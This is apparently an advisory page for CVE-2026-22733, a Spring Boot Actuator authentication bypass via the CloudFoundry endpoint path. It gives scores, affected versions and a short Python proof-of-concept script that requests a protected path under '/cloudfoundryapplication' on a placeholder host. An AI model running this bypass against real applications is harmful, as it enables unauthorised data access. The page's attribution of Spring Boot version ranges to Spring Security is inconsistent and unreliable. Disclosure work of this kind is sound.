Security Vulnerability Report
CVE-2026-22733 CVSS 8.2 HIGH

Published: 2026-03-20 00:16:16
Last Modified: 2026-04-23 14:24:38

Description

Spring Boot applications with Actuator can be vulnerable to an "Authentication Bypass" vulnerability when an application endpoint that requires authentication is declared under the path used by the CloudFoundry Actuator endpoints. This issue affects Spring Security: from 4.0.0 through 4.0.3, from 3.5.0 through 3.5.11, from 3.4.0 through 3.4.14, from 3.3.0 through 3.3.17, from 2.7.0 through 2.7.31.

CVSS Details

Source              CVSS Score  Severity  CVSS Vector
Secondary           8.2         HIGH      CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Primary (NVD)       8.1         HIGH      CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Weakness: CWE-288 (Authentication Bypass Using an Alternate Path or Channel)

Configurations (Affected Products)

CPE                                            Version range       Status
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*   < 2.7.32            VULNERABLE
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*   3.3.0 to < 3.3.18   VULNERABLE
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*   3.4.0 to < 3.4.15   VULNERABLE
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*   3.5.0 to < 3.5.12   VULNERABLE
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*   4.0.0 to < 4.0.4    VULNERABLE
Spring Security 4.0.0 - 4.0.3
Spring Security 3.5.0 - 3.5.11
Spring Security 3.4.0 - 3.4.14
Spring Security 3.3.0 - 3.3.17
Spring Security 2.7.0 - 2.7.31

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit: Authentication Bypass via CloudFoundry Actuator Path
# Target: Spring Boot applications using vulnerable Spring Security versions
target_url = "http://vulnerable-app.com"

# Normal protected endpoint that usually requires authentication
protected_path = "/api/user/data"

# Bypass path: leveraging the CloudFoundry Actuator endpoint prefix
# If the app is configured to map /api/user/data under /cloudfoundryapplication
bypass_path = "/cloudfoundryapplication/api/user/data"


def exploit():
    print("[*] Attempting to access protected resource via bypass...")
    try:
        # Send request to the bypass path
        response = requests.get(target_url + bypass_path, timeout=5)
        if response.status_code == 200:
            print("[+] Authentication bypass successful!")
            print(f"[+] Response content: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error occurred: {e}")


if __name__ == "__main__":
    exploit()

References

https://spring.io/security/cve-2026-22733 (Vendor Advisory)